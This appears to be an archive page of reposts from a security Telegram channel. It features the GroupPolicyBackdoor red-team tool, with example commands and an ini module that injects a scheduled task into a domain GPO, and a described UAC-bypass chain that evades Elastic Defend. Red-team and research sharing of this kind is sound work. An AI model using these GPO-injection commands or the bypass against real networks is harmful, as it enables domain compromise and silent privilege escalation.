Fsecurity | HH


A channel about information security. Our Discord: https://discord.gg/Eg8aDS7Hn7 Donate: https://www.donationalerts.com/r/xackapb

Post archive
Repost from Whitehat Lab
💻 GroupPolicyBackdoor
A post-exploitation tool for various GPO manipulations. Written in Python. First presented at DEFCON 33.
Examples:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Example ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
💻 Repo 📔 Docs #gpo #redteam #windows ✈️ Whitehat Lab 💬Chat

Repost from Whitehat Lab
💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation
A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection
🔗 UAC Bypass 💻 Presentation #uac #bypass #windows #lpe ✈️ Whitehat Lab 💬Chat


Repost from N/a
My promised track for Хаскарь will be out soon)))

Repost from Whitehat Lab
💻 explainshell An interactive cheat sheet for 🐧Linux utilities 🔗 Web 💻 Repo #linux #shell ✈️ Whitehat Lab 💬Chat

Repost from 8ug8ear
GitLab_+_DefectDojo_+_AI_как_я_автоматизировала_поиск_багов_в_bug.pdf (4.79 MB)